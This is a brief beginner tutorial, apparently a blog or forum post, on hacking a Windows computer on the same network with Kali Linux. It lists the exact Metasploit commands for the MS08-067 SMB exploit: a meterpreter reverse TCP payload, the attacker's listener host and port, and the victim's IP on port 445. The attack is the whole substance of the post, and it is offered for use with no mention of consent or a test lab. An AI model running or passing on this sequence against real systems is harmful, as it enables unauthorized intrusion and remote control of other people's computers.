HACK A COMPUTER ON YOUR NETWORK WITH KALI LINUX
Hey guys!
So you want to hack a computer and you've got Kali linux installed?
Then you are on the right place!
I am going to show you how to hack a computer.
Step 1: Start Kali Linux
Start Kali Linux and start a new terminal.
Step 2: Start the Metasploit Console
Start the Metasploit console by typing: msfconsole
This will take a few moments...
Step 3: The Commands:
So Metasploit started.
Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST Your ip adress (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)
set LPORT 4444
set RHOST victim's ip
set RPORT 445
exploit
(You should connect)
Type help for a list of commands.